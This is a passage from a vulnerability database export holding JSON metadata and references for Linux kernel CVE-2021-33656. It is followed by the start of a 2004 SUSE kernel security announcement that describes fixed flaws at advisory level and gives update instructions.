m\nkernel-tools-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-372.70.1.el8_6.x86_64.rpm\nperf-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\npython3-perf-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-33656\nhttps://access.redhat.com/security/cve/CVE-2022-42896\nhttps://access.redhat.com/security/cve/CVE-2023-1637\nhttps://access.redhat.com/security/cve/CVE-2023-1829\nhttps://access.redhat.com/security/cve/CVE-2023-2002\nhttps://access.redhat.com/security/cve/CVE-2023-2124\nhttps://access.redhat.com/security/cve/CVE-2023-3390\nhttps://access.redhat.com/security/cve/CVE-2023-20593\nhttps://access.redhat.com/security/cve/CVE-2023-28466\nhttps://access.redhat.com/security/cve/CVE-2023-35788\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIcBAEBCAAGBQJk7gVaAAoJENzjgjWX9erEbPcP/A7VJs/bk9ehr9RmtFheMoZw\naTjj77INTVUXeEw303RN0MY4WeA9iNLfoawU9pQwKSOTPFN2LH/dX5M5G4z8fcF4\nAqJ52MLnaRvfqvGR/VBL5ndG6Txal4qBaEthXiZPjXVLPdLBLUpKxFvc037T3vLa\nN1TlS84iuCj+lRKKK3mWzwpuxF+7rG5TyjfmKxBpdVpiy+3CesWdg8z/cp3yHnZR\nD+/bKMlWaFrot6epZTolqXR3q8gtzdfdvBT+uNCqWFLC4fbRcECz659shdKCe94s\nau3GaLQoSsv/1o2/Fr9p0X2355CUwo/blWmQRdxHhCrNVAW43zct7UdIefjQFdlN\nJMEKMLPlsPIqwFM5O24oXNwu2WDFBqhRqVOpU29wCb2A+nZX9KW7G5+wraGQsUle\nYKt8MyQTrmruN21UqRGTMBUzFmVcVbMoVuKhw8Ruzu+LT7Q8emlVlUIxdeZevVyI\nqAsK4u/21qEur8snQUZOs1K5JZ/eGvPPOFIlDKamAZUA2KMBRHVf4UpXWRl+yUNZ\nBwVlqJ883g5fzkyn610ip8wezvIt6JHbQTwfn3GL+GlZm8C6P7TnInRyRAPrEVyb\nx6ZgJXJcUSvxQ5vfDRxDzQBaki0LlsxEu0z4MNWTlQkijDMqEt+YvOoWnAPOfb6S\nE/3xFaymeUv8HNa2jzZE\n=8lpC\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33656"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "db": "VULHUB",
        "id": "VHN-393734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33656"
      },
      {
        "db": "PACKETSTORM",
        "id": "168221"
      },
      {
        "db": "PACKETSTORM",
        "id": "168236"
      },
      {
        "db": "PACKETSTORM",
        "id": "168237"
      },
      {
        "db": "PACKETSTORM",
        "id": "168177"
      },
      {
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "db": "PACKETSTORM",
        "id": "174369"
      },
      {
        "db": "PACKETSTORM",
        "id": "168251"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-33656",
        "trust": 3.5
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/07/19/3",
        "trust": 2.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "168251",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168177",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168221",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168237",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168236",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168263",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168253",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168264",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168324",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168203",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168335",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168589",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168261",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168238",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-393734",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33656",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "172587",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "174369",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-393734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33656"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "db": "PACKETSTORM",
        "id": "168221"
      },
      {
        "db": "PACKETSTORM",
        "id": "168236"
      },
      {
        "db": "PACKETSTORM",
        "id": "168237"
      },
      {
        "db": "PACKETSTORM",
        "id": "168177"
      },
      {
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "db": "PACKETSTORM",
        "id": "174369"
      },
      {
        "db": "PACKETSTORM",
        "id": "168251"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "id": "VAR-202207-1358",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-393734"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:37:02.433000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "drop\u00a0old\u00a0FONT\u00a0ioctls",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.1
      },
      {
        "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-393734"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/07/19/3"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33656"
      },
      {
        "trust": 1.2,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/stable-queue.git/tree/releases/5.10.127/vt-drop-old-font-ioctls.patch"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.openeuler.org/en/security/cve/detail.html?id=cve-2021-33656\u0026packagename=kernel"
      },
      {
        "trust": 0.4,
        "url": "https://ubuntu.com/security/notices/usn-5591-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33655"
      },
      {
        "trust": 0.2,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33656"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://www.openeuler.org/en/security/cve/detail.html?id=cve-2021-33656\u0026amp;packagename=kernel"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5591-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1136.146"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-192.203"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1150.165"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1052.57"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1126.131"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1135.151"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5591-3"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20368"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-36946"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5580-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-41674"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42721"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#critical"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3625"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-43750"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-4129"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-41218"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-3239"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-3522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-26341"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3239"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-25815"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42722"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1679"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2663"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-0361"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3707"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1582"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-22490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-3028"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20141"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-32314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-47929"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-39188"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2663"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-32313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1999"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26341"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1789"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3627"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-27535"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1789"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-20141"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-28856"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-23454"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-25265"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3524"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-39189"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-43552"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3970"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3028"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3567"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-0394"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-0461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-35252"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-25652"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33655"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:3326"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3628"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-36227"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3564"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1195"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42720"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-23946"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42703"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25265"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-29007"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1679"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-1829"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-35788"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:4789"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1637"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42896"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-1637"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42896"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-2002"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-2124"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-28466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-35788"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-28466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-3390"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-20593"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-1829"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-20593"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-3390"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-2002"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-2124"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5591-4"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1140.151"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-393734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33656"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "db": "PACKETSTORM",
        "id": "168221"
      },
      {
        "db": "PACKETSTORM",
        "id": "168236"
      },
      {
        "db": "PACKETSTORM",
        "id": "168237"
      },
      {
        "db": "PACKETSTORM",
        "id": "168177"
      },
      {
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "db": "PACKETSTORM",
        "id": "174369"
      },
      {
        "db": "PACKETSTORM",
        "id": "168251"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-393734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33656"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "db": "PACKETSTORM",
        "id": "168221"
      },
      {
        "db": "PACKETSTORM",
        "id": "168236"
      },
      {
        "db": "PACKETSTORM",
        "id": "168237"
      },
      {
        "db": "PACKETSTORM",
        "id": "168177"
      },
      {
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "db": "PACKETSTORM",
        "id": "174369"
      },
      {
        "db": "PACKETSTORM",
        "id": "168251"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-07-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-393734"
      },
      {
        "date": "2022-07-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33656"
      },
      {
        "date": "2023-09-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "date": "2022-09-01T16:32:59",
        "db": "PACKETSTORM",
        "id": "168221"
      },
      {
        "date": "2022-09-02T15:20:53",
        "db": "PACKETSTORM",
        "id": "168236"
      },
      {
        "date": "2022-09-02T15:21:10",
        "db": "PACKETSTORM",
        "id": "168237"
      },
      {
        "date": "2022-08-25T15:28:28",
        "db": "PACKETSTORM",
        "id": "168177"
      },
      {
        "date": "2023-05-26T14:34:05",
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "date": "2023-08-29T16:27:47",
        "db": "PACKETSTORM",
        "id": "174369"
      },
      {
        "date": "2022-09-05T15:08:18",
        "db": "PACKETSTORM",
        "id": "168251"
      },
      {
        "date": "2022-07-18T15:15:08.043000",
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-10-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-393734"
      },
      {
        "date": "2022-07-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33656"
      },
      {
        "date": "2023-09-28T03:25:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "date": "2022-10-29T02:52:00.693000",
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168221"
      },
      {
        "db": "PACKETSTORM",
        "id": "168236"
      },
      {
        "db": "PACKETSTORM",
        "id": "168237"
      },
      {
        "db": "PACKETSTORM",
        "id": "168177"
      },
      {
        "db": "PACKETSTORM",
        "id": "168251"
      }
    ],
    "trust": 0.5
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Out-of-bounds write vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168221"
      },
      {
        "db": "PACKETSTORM",
        "id": "168236"
      },
      {
        "db": "PACKETSTORM",
        "id": "168237"
      },
      {
        "db": "PACKETSTORM",
        "id": "168177"
      },
      {
        "db": "PACKETSTORM",
        "id": "168251"
      }
    ],
    "trust": 0.5
  }
}

var-200412-0084
Vulnerability from variot

Multiple unknown vulnerabilities in Linux kernel 2.6 allow local users to gain privileges or access kernel memory, a different set of vulnerabilities than those identified in CVE-2004-0495, as found by the Sparse source code checking tool. mandrakesoft of mandrake multi network firewall Unspecified vulnerabilities exist in products from multiple vendors.None. These vulnerabilities were referenced in a SuSe advisory, however, further details are not currently available. This BID will be updated or retired as more information becomes available. It is reported that these issues present themselves in Linux kernel 2.6. The leak did not provide specifics. -----BEGIN PGP SIGNED MESSAGE-----


                    SUSE Security Announcement

    Package:                kernel
    Announcement-ID:        SUSE-SA:2004:020
    Date:                   Tuesday, Jul 2nd 2004 18:00 MEST
    Affected products:      8.0, 8.1, 8.2, 9.0, 9.1
                            SUSE Linux Database Server,
                            SUSE eMail Server III, 3.1
                            SUSE Linux Enterprise Server 7, 8
                            SUSE Linux Firewall on CD/Admin host
                            SUSE Linux Connectivity Server
                            SUSE Linux Office Server
    Vulnerability Type:     local privilege escalation
    Severity (1-10):        6
    SUSE default package:   yes
    Cross References:   CAN-2004-0495
            CAN-2004-0496
            CAN-2004-0497
            CAN-2004-0535
            CAN-2004-0626


Content of this advisory:
    1) security vulnerability resolved:
    - chown: users can change the group affiliation of arbitrary
      files to the group they belong to
    - missing DAC check in chown(2): local privilege escalation
        - overflow with signals: local denial-of-service
        - pss, mpu401 sound driver: read/write to complete memory
        - airo driver: read/write to complete memory
        - ALSA: copy_from_user/copy_to_user confused
        - acpi_asus: read from random memory
        - decnet: write to memory without checking
        - e1000 driver: read complete memory
       problem description, discussion, solution and upgrade information
    2) pending vulnerabilities, solutions, workarounds:
    - icecast
            - sitecopy
            - cadaver
            - OpenOffice_org
            - tripwire
            - postgresql*
            - mod_proxy
    - freeswan
    - ipsec-tools
    - less
    - libpng
    - pavuk
    - XFree86*
    - kdebase3
    3) standard appendix (further information)

1) problem description, brief discussion, solution, upgrade information

Multiple security vulnerabilities are being addressed with this security
update of the Linux kernel.

Kernel memory access vulnerabilities are fixed in the e1000, decnet, 
acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers.

Missing Discretionary Access Control (DAC) checks in the chown(2) system
call allow an attacker with a local account to change the group
ownership of arbitrary files, which leads to root privileges on affected
systems. An interesting variant of the missing 
checks is that the ownership of files in the /proc filesystem can be 
altered, while the changed ownership still does not allow the files to 
be accessed as a non-root user for to be able to exploit the 
vulnerability. Systems that are based on a version 2.4 kernel are not 
vulnerable to the /proc weakness, and exploitation of the weakness 
requires the use of the kernel NFS server (knfsd). If the knfsd NFS 
server is not activated (it is off by default), the vulnerability is 
not exposed.

The only network-related vulnerability fixed with the kernel updates
that are subject to this announcement affect the SUSE Linux 9.1 
distribution only, as it is based on a 2.6 kernel. Found and reported 
to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability 
allows a remote attacker to send a specially crafted TCP packet to a 
vulnerable system, causing that system to stall if it makes use of 
TCP option matching netfilter rules.

In some rare configurations of the SUSE Linux 9.1 distribution, some 
users have experienced stalling systems during system startup.



SPECIAL INSTALL INSTRUCTIONS:
==============================
For the impatient: Run YOU (Yast2 Online Update, command 
"yast2 online_update" as root) to install the updates (semi) 
automatically, if you have a SUSE Linux 8.1 and newer system.

For those who wish to install their kernel updates manually and for 
those who use a SUSE Linux 8.0 system:

The following paragraphs will guide you through the installation
process in a step-by-step fashion. The character sequence "****"
marks the beginning of a new paragraph. In some cases, the steps
outlined in a particular paragraph may or may not be applicable
to your situation. 
Therefore, please make sure to read through all of the steps below
before attempting any of these procedures. 
All of the commands that need to be executed are required to be
run as the superuser (root). Each step relies on the steps before
it to complete successfully.

**** Step 1: Determine the needed kernel type

Please use the following command to find the kernel type that is
installed on your system:

  rpm -qf /boot/vmlinuz

Following are the possible kernel types (disregard the version and
build number following the name separated by the "-" character)

  k_deflt   # default kernel, good for most systems. 
  k_i386    # kernel for older processors and chipsets
  k_athlon  # kernel made specifically for AMD Athlon(tm) family processors
  k_psmp    # kernel for Pentium-I dual processor systems
  k_smp     # kernel for SMP systems (Pentium-II and above)
  k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM
  kernel-64k-pagesize
  kernel-bigsmp
  kernel-default
  kernel-smp

**** Step 2: Download the package for your system

Please download the kernel RPM package for your distribution with the
name as indicated by Step 1. The list of all kernel rpm packages is
appended below. Note: The kernel-source package does not
contain a binary kernel in bootable form. Instead, it contains the
sources that the binary kernel rpm packages are created from. It can be
used by administrators who have decided to build their own kernel. 
Since the kernel-source.rpm is an installable (compiled) package that
contains sources for the linux kernel, it is not the source RPM for
the kernel RPM binary packages.

The kernel RPM binary packages for the distributions can be found at the
locations below ftp://ftp.suse.com/pub/suse/i386/update/.

  8.0/images/
  8.1/rpm/i586
  8.2/rpm/i586
  9.0/rpm/i586
  9.1/rpm/i586

After downloading the kernel RPM package for your system, you should
verify the authenticity of the kernel rpm package using the methods as
listed in section 3) of each SUSE Security Announcement.

**** Step 3: Installing your kernel rpm package

Install the rpm package that you have downloaded in Steps 3 or 4 with
the command
